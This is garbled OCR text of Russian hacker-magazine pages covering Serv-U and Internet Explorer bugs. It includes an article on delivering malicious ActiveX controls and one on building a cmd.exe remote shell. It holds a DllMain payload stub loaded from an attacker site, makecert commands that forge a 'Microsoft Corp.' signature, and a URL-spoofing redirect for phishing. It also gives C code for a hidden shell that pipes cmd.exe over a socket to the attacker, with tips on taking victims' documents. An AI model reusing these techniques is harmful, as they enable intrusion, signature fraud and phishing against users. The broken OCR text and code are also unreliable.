т ail обе чы wnt | ТП oe Se ie мет ae pee 


er er trees Tee rere) Pitre Pir ete ree) pert, tree te Ce Ti ed 


РЕ РТИ 


bern) sheer Баг of peal Ба eepieen бы Eee PE Be ЬЕНУ See eee oe 


Подробнее: 
MS выпустила специальный патч, 
который фиксит смертоносный баг - 


. Технические 
детали бреши - на 


БАГИ В SERV-U FTPD 

Если спросить у пользователя ка- 
кой-нибудь локалки о лучшем ЕТР- 
сервере, то ответ наверняка будет: 
Serv-U. Отчасти это так, если не учи- 
тывать многочисленные баги даже в 
последних версиях демона :). Все на- 
чалось с того, что багоискатели ус- 
пешно обнаружили cpakT переполне- 
ния буфера при передаче кривых па- 
раметров к команде CHMOD. Если дли- 
на аргумента была более 256 симво- 


МНЕНИЕ ЭКСПЕРТА 


лов, становилось возможным помес- 
тить в стек произвольный код. В пос- 
ледующих версиях эту брешь устра- 
нили, но багоискатели опять обнару- 
жили баги в командах LIST и МОТМ (с 
похожими симптомами). Немного поз- 
же взломщики узнали, что демон све- 
тит локальный порт, к которому может 
подключиться администратор. После 
перехвата злоумышленник создает 
нового юзера со всеми правами, а за- 
тем открывает шелл запросом «SITE 
ЕХЕС ста». Несмотря на то что 
эксплоит применяется только для ло- 
кального поднятия прав, его можно 
легко использовать в дырявых 
cgi/php/asp скриптах. 

Защита: 

OT локального бага защиты пока не 
существует. А вот удаленные бреши 


offtopic, профессионал в области IT- 
безопасности, постоянный автор и 


модератор форумов проекта 
Securitylab.ru, MCSE и MCT 
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Найденный баг в Serv-U 


исправлены в новом релизе Serv-U 
( ). 

Подробнее: 

Все бреши в демоне рассмотрены в 
ежемесячном обзоре эксплоитов на 
страницах Хакера. Можешь посетить 

‚ где лежит техническая ин- 
формация о дырявом сервисе. 


БАГИ В INTERNET EXPLORER 

Ничего так не радует юзера, как 
его любимый браузер. Но за красивы- 
ми окошками и навороченными воз- 
можностями IE таятся роковые баги. 
Если рассматривать бреши в послед- 
ней версии IE, то грех не упомянуть 
про некорректную обработку ВМР- 
изображений, в результате которой 
любой желающий способен подве- 
сить даже самую стойкую Винду. Или 
даже выполнить произвольный код с 
правами лопоухого юзера (чаще все- 
го с админскими привилегиями). Чуть 
позже мир узнал о многочисленных 
ослиных багах, с помощью которых 
хакер мог провести XXS-aTaky и за- 
лить (а также запустить и прописать в 
автостарт) произвольный Файл. И, на- 
конец, стоит напомнить, что браузер 
плохо говорит по-гречески - если ос- 
тавить на вебе ссылку типа «абои{:бо- 
лее_2000_греческих_буковок», 
Explorer не успеет даже пискнуть, а 
сразу же повесит себя, а заодно и 
всю систему :). 

Защита: 

Спасение ищи на . Сперва 
слей кумулятивный патчик, затем пос- 
ледовательно выкачивай заплатки 
для каждого сокрушительного бага. 

Подробнее: 

На найдешь полный спи- 
сок уязвимостей в браузере. Достаточ- 
но лишь воспользоваться поиско 
введя запрос «Internet Explorer». 
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Зло и Internet Explorer 
Как создать полезный Activex gna 
ослика 


CMD-shell на службе у 
хакера 
Секреты командного интерпретатора 


Пошаговая 
имперсонализация 
Взлом админского пароля в 
Windows 2000/ХР/2003 


ВРС ОСОМ для 
младшего братика 
Популярная эксплуатация 
известного бага 


Через образы к сердцу 
Атака Ha NTFS 


Удар издалека 
Теория и практика удапенных атак 


Эксплоит для сетевого 
чата 
Поиск и использование уязвимости 
в Network Assistant 


4 Кто ищет, TOT всегда 
наидет 
Поисковый сервер как оружие 


ЗЛО UV INTERNET EXPLORER ) 


Петр Каньковски (kankowski@narod.ru) 


ЗЛО И INTERNE ; 
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КАК СОЗДАТЬ ПОЛЕЗНЫЙ 
ACTIVEX ДЛЯ ОСЛИКА 


инженерии. Наслаждайся! 


ырок в IE столько, что их ехроЙ'ацией не баловался разве что совсем 
Д ленивый. Но использовать многократно описаные в интернете методы - это 
не наш выбор. Поэтому предлагаем твоему вниманию нетривиальный способ, 
основанный на ActiveX, поддельных электронных подписях и социальной 


ЧТО ТАКОЕ ACTIVEX 
И ЧЕМ ЕГО КОДЯТ? 

m= ActiveX - это майкрососрто- 
вская технология внедрения в 
\меб-страницы и программы 
контролов (элементов управления). Контрол 
есть обычная библиотека с расширением 
DLL или ОСХ, которая выводит Ha web-cTpa- 
ницу что-нибудь вроде кнопки с прыгающей 
картинкой. Кнопка прорисовывается, реагиру- 
ет на мышедвижения и кнопконажатия, имеет 
свои свойства и методы, которыми можно уп- 
равлять из JavaScript. Вспомним, например, 
мультики и баннеры Ha Macromedia Flash в ок- 
He IE. Это и есть Activex. 

Писать ActiveX можно на C++, Delphi, тео- 
ретически даже на Ассемблере. Можно Ba- 
ять их и на Visual Basic, но это скорее груст- 
но, чем смешно. Для MS Visual С++ есть две 
основные альтернативы - МЕС и ATL. МЕС - 
очень мощная и гибкая библиотека, но ее 
нужно либо статически прилинковывать к 
своей программе (тогда ехе'шник получает- 
ся слишком большим), либо устанавливать 
DLL (что еще более муторно и чревато кош- 
маром DLL Hell). 

Поэтому ActiveX для IE пишут с помощью 
ATL. Чтобы испытать это на практике, загру- 
зим VC++ 6.0, выберем File -> New -> Projects 
-> ATL СОМ AppWizard. В мастере можно сра- 
Зу нажать Finish. Нашему взору откроется 
заготовка нового приложения ATL. Затем 
смело выбираем Insert -> New ATL Object -> 
Controls -> HTML Control, a дальше проходим 
по шагам мастера и ставим нужные парамет- 
ры. Он сгенерирует каркас контрола, на ко- 
торый затем можно будет навешивать код 
для прорисовки кнопки, обработки нажатий 
на нее и прочих телодвижений. 


НАШ КОНТРОЛ - ПРОСТАЯ DLL 

и Сначала я так и сделал (точнее, просто 
переделал пример ATLButton из MSDN, кото- 
рый вообще очень интересен тем, кто соби- 
рается кодить ActiveX-KOHTponbl). А потом 3a- 
дался вопросом, какой в этом смысл. Ведь 
наша цель - запустить вредоносный код. А 
для этого не нужно ни инициализировать 
СОМ, ни регистрировать контрол в реестре, и 
уж тем более не нужно рисовать кнопки на 
экране. В итоге получается, что ActiveX не 
требуется вообще :). 

Как всякая технология, Activex базируется 
на другой технологии, а именно, на DLL. А в 
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библиотеках DLL есть такая любопытная 
вещь, как срункция DilMain, которую Windows 
вызывает при подгрузке и выгрузке библио- 
теки. Чтобы создать ActiveX контрол, система 
будет обращаться к функциям 
DilRegisterServer и DilGetClassObject в нашей 
библиотеке, но перед этим ей так или иначе 
придется эту библиотеку загрузить. А что ес- 
ли разместить злой код в DilMain, с которой 
начинается эта цепочка вызовов? 


BOOL APIENTRY DiIMain(HANDLE hModule, DWORD 
reason, LPVOID Reserved) 

{MessageBox(0, "hacked!", "Хакер", 0); 

//3geCb ставится произвольный код ;) 

return TRUE; } 


Вот и вся программа. Если убрать CRT, To 
останется всего 2,5 Кб. А самый простой ATL- 
контрол весит больше 30 Кб - что называет- 
ся, почувствуйте разницу! Теперь создаем 
HTML-cpaiin, в котором пишем что-нибудь 
вроде: 


<OBJECT CLASSID="CLSID:0499388E-3A64-11D0- 
BFAB-080000185165" 


codebase="http://www.xakepsite.ru/MyDLL.dll'"> 


Числа после CLSID можно ставить случай- 
ные, главное, чтобы они не совпадали с иден- 
тификаторами стандартных контролов (а чи- 
сел настолько много, что этого не произойдет 
никогда). Открываем страничку и видим... Нет, 
скорее всего, ничего не видим, потому что не- 
подписанные контролы по умолчанию отклю- 
чаются. Вернее, на данном этапе нашего 
большого пути эфорект (в виде сообщения 
«hacked!»») от этого зла появится, только если 
будет установлен низкий уровень безопас- 
ности, а в содеразе прописан локальный ад- 
рес DLL. Но перед этим IE покажет противное 
окно-уведомление о том, что контрол не под- 
писан. Как этого избежать? Существует уяз- 
вимость электронных подписей (см. ссылку во 
врезке), которую теоретически можно ис- 
пользовать для запуска неподписанных 
ActiveX, однако ни одного публичного экспло- 
ита для этой уязвимости нам найти не уда- 
лось. И тогда настал черед поддельных под- 
писей и социальной инженерии... 


ЭЛЕКТРОННЫЕ ПОДПИСИ 
и Любой человек без особого напряжения 
может получить свою личную электронную 


подпись. Для этого нужно взять Ba- 
лидный номер кредитки (не будем го- 
ворить, где его можно найти), запла- 
тить $20 компании VeriSign 
(www.verisign.com) - и подписывай конт- 
ролы сколько душе угодно. Как это ни 
странно, проверять написанные тобой 
программы никто не будет, как не най- 
дется и желающих уточнить твое имя 
и фамилию. Процедура получения 
электронного сертификата во многом 
сфрормальна, и подпись, по сути, не 
подтверждает безопасности Activex 
контрола. 

Разумеется, я ничем подобным не 
занимаюсь и потому для иллюстрации 
решил создать тестовый сертификат 
утилитой makecert из ActiveX SDK. Са- 
мое забавное в ней то, что можно ука- 
зать любое имя, например, название 
известной корпорации: 


makecert -u:secreti23 -n:CN="Microsoft 
Corp." cert.cer 

cert2spc root.cer cert.cer cert.spc 

signcode -prog MyDIl.dll -spc cert.spc -pvk 
secreti23 


В результате библиотека наша уве- 
личится go 3,8 Кб, а при открытии 
\меБ-страницы будет появляться такое 
окошко, как на картинке. 


Довольно похоже на обычную цифр- 
ровую подпись, не так ли? А если на 
английском, то добрая половина чай- 


ников вообще ничего не поймет. Эф- 
фект усилится, если перед загрузкой 
своего ActiveX предложить пользова- 
телю скачать новую версию Flash для 
просмотра симпатичного мультика. 
Второй раз он, не особенно вчитыва- 
ясь в текст предупреждения, нажмет 
на Yes, предвкушая новую порцию 
анимации. 

Разумеется, надеяться на то, что на- 
ша жертва будет такой слабоумной, 
нам не приходится, поэтому есть спо- 
соб обмануть и менее доверчивых 
пользователей. 


КЛОНИРУЕМ ИЗВЕСТНЫЙ САЙТ 

и Одна из уязвимостей в IE позво- 
ляет подменить текст, отображаемый 
в адресной строке. Несмотря на то что 
патч вышел еще в феврале этого го- 
да, большинство систем почему-то go 
сих пор подвержено этой ошибке. 
Сценарий атаки таков. Есть какой-то 
известный сайт, например, www.brit- 
пеу.сот. Кибер-сквоттер покупает go- 
менные имена www.brinty.com и 
www.brinti.com. Ha них он ставит такой 
редирект: 


<script language="JScript"> 
location.href=unescape(‘http://www.brit- 

ney.com%01@xakepsite.ru/hack.htm’') 
</script> 


В результате браузер переходит Ha 
xakepsite.ru/hack.htm, но в адресной 


— 


Ш http://www.securitylab.ru/?id=40822 - уязвимость, которая при 
переполнении памяти теоретически позволяет выполнить ActiveX 


без подписи. 


ш http://continue.to/trie - список не закрытых патчами уязвимос- 
тей в IE со ссылками на эксплоиты. 

м http://www.guninski.com/signedactivex2.html - эта уязвимость 
позволяет загружать старые версии системных DLL с багами, к ко- 
торым применимы давно известные эксплоиты. 


строке отображается www.britney.com! 
(Подробнее о реализации этого бага 
для воровства почтовых паролей пи- 
can NSD в одном их номеров Х.) В 
нашем же случае злоумышленнику 
остается только скопировать 
оформление оригинального сайта и 
среди парочки Наз$П-мультиков вста- 
вить в него агрессивный Activex. Ta- 
кую шутку будет особенно легко 
сыграть с некоторыми корпоратив- 
ными сайтами, которые в своем ис- 
ходном варианте насыщены ActiveX- 
контролами. 

Пользователь даже не почувству- 
ет разницы. Еще раз посмотри на 
картинку. Ты на сайте известной 
корпорации и качаешь ActiveX ее же 
производства. Какой тут может быть 
подвох? Если тщательно скопиро- 
вать оформление и содержание сай- 
та, можно обдурить самого крутого 
админа, потому что почти никто не 
читает этих глупых предупреждений. 
Именно так работает социальная ин- 
женерия в сочетании с хорошо по- 
добранными эксплоитами. 

Кстати, когда установлен низкий 
уровень безопасности, предупреж- 
дение даже не появляется. Если 
удастся найти эксплоит для cross- 
zone scripting, можно запустить 
ActiveX в зоне "Мой компьютер", и 
тогда пользователю вообще не за- 
дадут никаких вопросов о безопас- 
ности. Хотя в этом случае логичнее 
и проще запускать обычный 
ехе'шник через уязвимость MHT 
Redirection и не возиться с Activex. 


ХОЧЕШЬ МИРА = ГОТОВЬСЯ 
К ВОЙНЕ 

и Как защититься от таких атак? 
Перейти на другие браузеры? Не вы- 
ход - в Орега тоже частенько нахо- 
дят баги, хотя, надо признать, нор- 
вежцы исправляют их быстрее, чем 
Microsoft. Самый действенный спо- 
соб - отключить Active-X. В свойствах 
IE, закладка "Securuty", кнопка 
"Custom Level", стоит поставить вы- 
сокий уровень для всех зон (компью- 
тер, интернет, локальная сеть). Зона 
"Мой компьютер" по умолчанию 
скрыта. Чтобы показать ее, нужно 
изменить параметр HKEY_CUR- 
RENT_USER\Software\Microsoft\Wind 
ows\CurrentVersion\Internet 
Settings\Zones\(HoMep 30HbI)\Flags. 
Сбрось в этом числе "шестнадцате- 
ричный бит" Ох20. Например, у меня 
стоит Ox21, значит, нужно оставить 


только единицу. SE 


Электрон- 
ная подпись 
не гаранти- 
рует безо- 
пасности 
продукта ;). 


Старый не 
всегда озна- 
чает неэф- 
фективный. 
Обрати вни- 
мание на 
жалобы 
пользовате- 
лей в цент- 
рах техни- 
ческой под- 
держки :). 


Использование переведенной в статье информа- 
ции о подделке электронных подписей совершенно 
противозаконно. Данная информация публикуется 
исключительно в ознакомительных целях. Статья бы- 


ла написана с целью показать уязвимые места IE и 
предупредить пользователей и производителя, а не 
для поддержки преступников. За использование ин- 
формации в противозаконных целях автор и редакция 
ответственности не несут! 
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CMD-SHELL НА СЛУЖБЕ У ХАКЕРА ) 


Крис Касперски aka мыщьх 


CMD-SHELL НА 
СЛУЖБЕ У ХАКЕРА \ 


СЕКРЕТЫ КОМАНДНОГО ИНТЕРПРЕТАТОРА 


S 


С 


истемы удаленного администрирования пользуются огромной популярностью. Свежие версии идут нарасхват, поскольку 
прежние уже давно ловятся антивирусами и становятся неактуальны. Однако настоящий хакер не может позволить се- 
бе зависеть от сторонних разработчиков, и весь необходимый инструментарий он должен уметь создавать самостоятельно. 


в 


полсотни лет назад, 


когда о графических 


средах никто и не слы- 


шал, а монитор, спо- 
собный отображать бо- 
лее четырех цветов, все еще оставал- 
ся предметом роскоши, роль Nocpeg- 
ника между человеком и машиной ло- 
жилась на плечи командного интерп- 
ретатора. Что такое командный инте- 
рпретатор? Это черный экран и мер- 
цающий курсор. За кажущейся уны- 
лостью и аскетичностью терминаль- 
ных апартаментов (gO царственной 
роскоши графических интерфейсов 
им действительно далеко) скрывается 
чрезвычайно мощный и к тому же 
нетребовательный к ресурсам инстру- 
мент. 

Комананый интерпретатор опирает- 
ся на язык (который, как известно, оп- 
ределяет мышление), а графические 
оболочки - Ha тыкательный инстинкт, 
действующий всегда по одной и той 
же схеме. Командный интерпретатор 
может читать ввод как с клавиатуры, 
так и из файла. Графическая оболоч- 
ка же во всем полагается на мышь. 
Сравнение можно продолжать беско- 
нечно, но сам CpakT наличия терми- 
нальных приложений в эпоху засилья 
аляповатых икончатых интерфейсов 
уже о многом говорит! 

Сильной стороной УМХ-систем была 
и остается хорошо продуманная кома- 
ноная строка. С ее помощью можно 
сделать абсолютно все, что только 
возможно, а при желании - и часть 
невозможного. Причем между локаль- 
ной и удаленной консолью нет ника- 
кой принципиальной разницы. Кома- 
ноный интерпретатор с одинаковым 
аппетитом поглощает символы, как 
набранные на клавиатуре, так и посту- 
пающие в компьютер по сети (правда, 
регистрация root'a с удаленной консо- 
ли чаще всего запрещена). 

Windows МТ в этом смысле намного 
более ущербная система. Штатный 
интерпретатор можно назвать кома- 
наным с очень большой натяжкой. 
Лишь некоторые из настроек системы 
допускают возможность удаленного 
управления, а остальные приходится 
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настраивать локально, мышью. И хотя 
ядро системы не имеет к этому ника- 
кого отношения (при желании можно 
самостоятельно реализовать кон- 
сольные версии всех конфригурацион- 
ных утилит), отсутствие их в штатном 
комплекте поставки сильно огорчает. 
К счастью, начиная с Windows 2000 
командный интерпретатор был суще- 
ственно переработан, появилось мно- 
жество новых консольных утилит, бо- 
лее или менее полно покрывающих 
потребности удаленного управления. 


ЭКСПЛУАТАЦИЯ 
ЭКСПЛУАТАТОРОВ! 

Что можно сделать с удаленной 
системой вероятного противника? Ес- 
тественно, захватить! Обычно для 
этой цели засылается система уда- 
ленного администрирования, предс- 
тавляющая собой более или менее 
продвинутый командный интерпрета- 
тор. Но ведь на удаленной машине 
уже есть командный интерпретатор! 
Для Windows 2000/XP - это 


cmd.exe, и все, что нам нужно сде- 
лать, запустить его на выполнение и 
организовать OGHO-, а лучше двухсто- 
ронний канал связи. 

Грубо говоря, командный интерпре- 
татор упаковывается в своеобразный 
"конверт", также называемый "дис- 
петчер". В задачу диспетчера входит 
получение входящих команд (отправ- 
ленных взломщиком), передача их ко- 
мандному интерпретатору Ha выпол- 
нение, перехват результата и возра- 
щение его хакеру. 

Простейшие диспетчеры работают 
только на прием, вынуждая хакера 
ломать систему вслепую. Впрочем, 
всегда можно перенаправить станда- 
ртный вывод в какой-нибудь публич- 
ный файл. Главное достоинство тако- 
го приема в его простоте. Исходный 
текст диспетчера свободно укладыва- 
ется в десяток строк кода, компилиру- 
емых в считанное количество машин- 
ных команд. А компактность Shell-Ko- 
да для большинства переполняю- 
щихся буферов весьма актуальна. 


vee Ч’ НЕЕ еее: И 


Конкретный пример реализации мо- 
жет выглядеть так: 


Диспетчер может работать через 
любой выбранный порт (например, 
6669), причем серверную сторону 


лучше размещать на компьютере 
взломщика. Диспетчер, открывающий 
новый порт на компьютере жертвы, 
во-первых, слишком заметен, а, во- 
вторых, большинство администрато- 
ров блокируют входящие соединения 
на все непубличные узлы. Атаковать 
же публичный узел никакого смысла 
нет - в девяти из десяти случаев он 
расположен в DMZ-30He (зоне сопри- 
косновения с интернетом), надежно 
изолированной от корпоративной ло- 
кальной сети. 

Попав на атакуемый компьютер, мы 
можем, например, посредством коман- 
ды XCOPY скопировать секретные go- 
кументы в общедоступную папку, ска- 
чивая их оттуда обычным путем (спи- 
сок имеющихся папок поможет выяс- 
нить команда dir). И все бы ничего, да 
вот "слепой" набор уж слишком нап- 
рягает. Хотелось бы доработать дис- 
петчер так, чтобы видеть результат 
выполнения команд на своем экране. 

По сети ходит совершенно чудо- 
вищный код, пытающийся засунуть 
стандартный ввод/вывод интерпре- 
татора в дескрипторы сокетов и на- 
деющийся, что этот прием однажды 
может сработать. Однако первая же 
проверка убеждает нас в обратном. 
Сокеты - это не дескрипторы, и сме- 
шивать их в одну кучу нельзя. Чтобы 
диспетчер реально заработал, необ- 
ходимо связать дескрипторы с пай- 
пами (от англ. «pipe» - трубы), а са- 
ми пайпы - с дескрипторами. Причем 
напрямую пайпы с дескрипторами 
несоединимы, поскольку исповедуют 
различные концепции ввода/выво- 
да: пайпы используют функции 


УМНЫЕ СОВЕТЫ OT MICROSOFT 


ReadFile/WriteFile, а сокеты - 
recv/send, что существенно усложня- 
ет реализацию диспетчера. 

Корректно написанный shell требует 
создания как минимум двух пайпов - 
один будет обслуживать стандартный 
ввод, соответствующий дескриптору 
hStdinput, другой - стандартный вы- 
вод, соответствующий дескрипторам 
hStdOutput и hStdError. Дескрипторы 
самих пайпов обязательно должны 
быть наследуемыми, в противном слу- 
чае порожденный процесс просто не 
сможет до них "дотянуться". А как 
сделать их наследуемыми? Да очень 
просто - всего лишь взвести сфлаг 
bInheritHandle в состояние TRUE, пе- 
редавая его функции CreatePipe 
вместе со структурой 
LPSECURITY_ATTRIBUTES, инициали- 
зированной вполне естественным об- 
разом. 

Остается подготовить структуру 
STARTUPINFO, сопоставив дескрипто- 
ры стандартного ввода/вывода насле- 
дуемым каналам, и ни в коем случае 
не забыть взвести срлаг 
STARTF_USESTDHANDLES, иначе 
факт переназначения стандартных 
дескрипторов будет наглым образом 
проигнорирован. 

Однако это еще не все, и самое ин- 
тересное нас ждет впереди! Для свя- 
зывания каналов с сокетом удаленно- 


го терминала нам потребуется реали- CMD в 
~ ~ опытных 
зовать специальный резидентный руках - 
диспетчер, считывающий поступаю- страшная 
сила ;). 


щие данные и перенаправляющий их 
в сокет или канал. Вся сложность в 
том, что проверка наличия данных в 
сокете (канале) должна быть неблоки- 
руемой, в противном случае нам пот- 


ребуются два диспетчера, каждый из На диске ты 


ы 7 найдешь 
которых будет выполняться в "своем дополни- 
потоке, что, согласись, громоздко и и : 

т. и ис- 
неэлегантно. ходники для 
Обратившись к Platform SDK, мы этой 


найдем две полезных функции: тали: 


ЙА м a a | ni rs Tai alll 
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Редактирование переменной окружения COMSPEC, содер- 
жащей путь к командному интерпретатору 


АТАКА HA WINDOWS 


wn 
= 
о 
a 
z 
= 
< 
= 
< 
4 
< 
- 
< 


Команда 
PRINT - 
удобная 
штука для 
опустоше- 
ния прин- 
терного 
лотка (ау 
лазерных 
принтеров 
лоток очень 
быстро 
опустоша- 
ется). 
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Уфо ас 


Теперь мы можем выполнять на сервере 
различные консольные программы Так, 


будто запущены на нашей машине. 


PeerkNamePipe и ioctlsocket. Первая 
отвечает за неблокируемое измере- 
ние "глубины" канала, а вторая обслу- 
живает сокеты. Теперь диспетчериза- 
ция ввода/вывода становится триви- 
альной. 


// Заполняем поля структуры 
SECURITY_ATTRIBUTES 

// (позже она будет передана функции 
CreateProcess) 
// секретность не требуется 
sa.lpSecurityDescriptor = NULL; 
// длина структуры SECURITY_ATTRIBUTES 
sa.nLength = sizeof(SECURITY_ATTRIBUTES); 
// дочерний процесс наследует матери- 
нские обработчики 

sa.blnheritHandle = TRUE; 

// создаем пайпы, через которые впос- 
ледствии будет течь весь BBOG/BbIB 


if (1CreatePipe(&cstdin, &wstdin, 
return -1; 
if ((CreatePipe(&rstdout, &cstdout, &sa, 0)) 
return -1; 
[| считываем состояние текущеи консоли 
GetStartupInfo(&si); 


// говорим, какие именно атрибуты мы 
будет изменять 
si.dwFlags = STARTF_USESTD- 
HANDLES | STARTF_USESHOWWINDOW; 
si.wShowWindow = SW_HIDE;// прячем ок- 
но от постороннего 
si.hStdOutput = cstdout;// направляем 
андартный вывод в пайп 
si.hStdError = cstdout;// направляем 
стандартный вывод об ошибках в пайп 
si.hStdInput = cstdin; // направляем стан- 
ртный BBOG В пайп 
// создаем новую консоль со скрытым ок- 
ном, ввод/вывод которой связан с пайпами 
if (1CreatePrc (0, SHELL, 0, 0, TRUE, CRE- 
ATE_NEW_CONSOLE, 0,0,&si,&pi)) return -1 
// мотаем цикл, пока окно не будет зак- 
рыто 

while(GetExitCode (pi.hProcess,&fex 
it) && (fexit == STILL_ACTIVE)) 


Г 
{ 


// проверяем наличие данных в пайпе 

if (PeekNamedPipe(rstdout, buf, 1, &N, 
&total, 0) && N) 

{ 

// читаем данные из пайпа и передаем 
их в сокет 

for (а =0;а‹ 
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total; a += MAX_BUF_SIZE) 


feadFile(rstdout, buf, MAX_BUF_SIZE, &N, 0); 

send(csocket, buf, N, 0); 

} 

} 

// проверяем наличие данных в сокете 

if (ioctlsocket(csocket, FIONREAD , &N) && №) 

{ 

// читаем данные из сокета 

recv(csocket, buf, 1, 0); 

// корректируем формат перевода стро- 
ки из UNIX'a в MS-DOS 

f (*buf == \хОА’) WriteFile(wstdin, "\xOD", 
1, &N, 0); 

// записываем данные в пайп 

WriteFile(wstdin, buf, 1, &N, 0); 

} 

// отдаем остаток процессорного време- 
ни остальным потокам системы 

Sleep(1); 

} 


Теперь мы можем выполнять на ата- 
куемом узле различные консольные 
программы так, будто бы они были за- 
пущены на нашей машине. Только не 
пытайся запускать FAR или подобные 
ему приложения, использующие 
функцию WriteConsole для вывода ин- 
формации на экран. Наш диспетчер 
перехватить ее не в состоянии! 


КОМАНДЫ ХАКЕРСКОГО 
БАГАЖА 

и Какой же командный интерпрета- 
тор обходится без команд? Ниже пе- 
речислены наиболее популярные в 
хакерской среде команды и консоль- 
ные утилиты, вызываемые из KOMAHG- 
ного интерпретатора, снабженные 
подробными комментариями. За 90- 
полнительной информацией можно 
обратиться, как ни странно, к справоч- 
ной системе Windows, либо просто за- 
пустив файл cmd.exe с ключом /. 


ASSOC 

При запуске без параметров выво- 
дит список зарегистрированных типов 
файлов и ассоциированных с ними 
типов приложений, что позволяет вы- 
яснить, какие вообще приложения на 
данном компьютере есть. Теоретичес- 
ки эту команду можно использовать 
для подмены или удаления ассоциа- 
ций, однако через непосредственное 


обращение к реестру это сделать нам- 
ного удобнее. 


АТ 

Позволяет запускать приложения 
по расписанию (в том числе и на со- 
седних машинах локальной сети). 
Нуждается в правах администратора 
и службе планировщика. Ни того, ни 
другого в распоряжении атакующего 
обычно не оказывается, увы. 


CACLS 

Управляет правами доступа к фай- 
лам и каталогам, перечисляя имена 
всех пользователей, имеющих доступ 
к данному файлу (папке), и позволяет 
их изменить. Естественно, менее при- 
вилегированные пользователи не мо- 
гут воздействовать на более привиле- 
гированных, что существенно ограни- 
чивает возможности данной команды, 
но отнюдь не делает ее бесполезной. 


CALL 

Вызывает один пакетный срайл из 
другого, при необходимости переда- 
вая ему один или несколько аргумен- 
тов (например, call cmd_file.bat "hello, 
world!"). В качестве разделителя apry- 
ментов используется символ "про- 
бел". Если необходимо передать аргу- 
мент с символом пробела, его следует 
заключить в кавычки. 

Частая ошибка начинающих - вы- 
зов пакетного файла без команды 
CALL (например, cmc_file.bat "hello, 
world!"). Дочерний файл действитель- 
но вызывается, но управление в мате- 
ринский уже не возвращается, пос- 
кольку в отсутствие CALL'a вызывае- 
мый файл затирает текущую копию 
командного интерпретатора в памяти. 

Другая проблема - типичный про- 
ект состоит из нескольких пакетных 
файлов, но только один из них пуско- 
вой, а остальные вспомогательные. 
Как защитить пользователя от слу- 
чайного запуска "не того" файла? Og- 
но из возможных решений выглядит 
так: при запуске служебных файлов 
главный файл должен передать им 
"магический пирожок", подтверждаю- 
щий правомерность запуска. При за- 
пуске служебного cpaiina пользовате- 
лем такого "пирожка", естественно, не 
оказывается и файл либо выдает по- 
ясняющие сообщение, либо самостоя- 
тельно запускает основной срайл. Тог- 
да пользователь может запускать лю- 
бой файл, и это все равно будет рабо- 
тать ;). 

Рассмотрим простейший пример ре- 
ализации. Главный командный файл: 


ФАЙЛ MAIN.BAT 

@ECHO OFF 

FOR %%A IN (*.%1) DO 
print_file name _ 666_ 


Вспомогательный командный файл: 


@ECHO OFF 


REM проверяем наличие магического 
«пирожка», и, если его нет, 

ВЕМ вызываем основной файл програм- 
мы, не забыв при этом 

ВЕМ передать ему аргументы командной 
строки 

IF NOT #%1#==# 666 _# main.bat %1 %2 
%3 %4 %5 %6 

ВЕМ если мы здесь, это значит, что нас 
вызвали умышленно, 

ВЕМ а не случайно. А раз так - выкусы- 
ваем магический 

ВЕМ «пирожок» и начинаем делать то, 
что мы должны делать ;) 

SHIFT 


REM * * * тело программы * * 


К сожалению, командные сфайлы не 
поддерживают возможности вызова 
процедур (или, в терминологии Си, 
функций), что затрудняет решение 
многих задач и вообще уродует прог- 
раммный листинг. Обычно в таких слу- 
чаях прибегают к вызову внешних ко- 
мандных файлов, что также не есть 
хорошо, так как вспомогательные ко- 
мандные срайлы смотрятся не очень 
красиво. Тем не менее, эта задача 
вполне решаема. Пусть командный 
файл вызывает сам себя, передавая в 
качестве аргумента имя метки, на ко- 
торую надо осуществить передачу уп- 
равления. Естественно, еще потребу- 
ется включить в строку аргументов 
специальное ключевое слово, обоз- 
начающее вызов ‹функции, а в начало 
пакетного файла - особый обработ- 
чик, который при наличии этого само- 
го ключевого слова перехватывал бы 
поток управления на себя и, COBUHYB 
список аргументов на две позиции 
влево, передавал бы управление на 
указанную метку. 

Одна проблема - возврат значений. 
Вероятно, единственное, что здесь 


можно предложить, - использовать 
переменные окружения, а имеет 
смысл передавать имя переменной 
как аргумент, чтобы вызываемой и 
вызывающей срункциям было легче 
"договориться", в противном случае 
их будет трудно разрабатывать неза- 
висимо друг от друга. Посмотрим на 
пример реализации: 


@ECHO OFF 

REM Менеджер вызова процедур 

REM ARG: 

REM CALL %0 _call имя_метки_функции 
аргументы_функции.. 

REN 
‘call_manager 
IF NOT #%1#==#_call# GOTO call_manag- 
er_end 
HIFT 
HIFT 
ОТО %0 
‘call_manager_end 


‘пан 
ет пример вызова функции 
print_file_ name 

FOR %%A IN (*.*) DO CALL %0 _call 
print_file name "%%A" 


FIND/FINDSTR 

Поиск двоичных данных (текстовых 
строк) в группе файлов. Своеобраз- 
ный аналог <ALT-F7> в FAR'e. Основ- 
ное оружие взломщика для поиска 
интересных документов на сервере. 


TIME 

Задает текущее системное время, He 
требуя прав администратора, что де- 
лает ее самой деструктивной KOMaHG- 
ной из всех представленных. Mpegc- 
тавь, что произойдет с документообо- 
ротом и базой данных, если время 
окажется скачкообразно переведено 
на несколько лет вперед! 


REM * Основное тело командного файла * 


Командный интерпретатор - слишком 
опасная ипука, чтобы держать 
его на своей машине. 
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XCOPY 

Основное средство копирования 
файлов и подкаталогов из одной ди- 
ректории в другую. 


ЗАЩИТА ОТ ВТОРЖЕНИЯ 

m Из всего вышесказанного можно 
сделать вывод, что командный интер- 
претатор - слишком опасная штука, 
чтобы держать его на своей машине. 
Но и удалить его мы не можем - пе- 
рестанут работать некоторые инстал- 
ляторы и программы-оболочки (нап- 
ример, FAR). К тому же, оставлять се- 
бя без командой строки - это не вы- 
ход. Может, попробовать переимено- 
вать его? Тогда атакующие програм- 
мы останутся не у дел! Однако с ле- 
гальными программами произойдет то 
же самое, поскольку они определяют 
имя командного интерпретатора по 
переменной СОМ$РЕС, а она по умол- 
чанию указывает на 
C:\WINNT\System32\cmd.exe. 

Попробуем переименовать cmd.exe 
в w2k_commander.exe, соответствую- 
щим образом скорректировав пере- 
менную COMSPEC. Кликнув по иконке 
"Мой компьютер" правой клавишей 
мыши, выберем в контекстном меню 
пункт "Свойства", в появившемся ди- 
алоговом окне ищем закладку "До- 
полнительно", а в ней - кнопку "Пе- 
ременные среды". COMSPEC будет 
расположена среди системных пере- 
менных, и для ее изменения необхо- 
димы права администратора. Теперь 
напишем коротенькую программу, вы- 
водящую на экран предупреждение о 
хакерском вторжении, и переименуем 
ее в cmd.exe. Все! 

При всей своей простоте предло- 
женный прием необычайно эфоректи- 
вен. Хакеры и сетевые черви практи- 
чески никогда не анализируют пере- 
менную окружения COMSPEC, пос- 
кольку это требует определенного 
пространства для маневра, а в пере- 
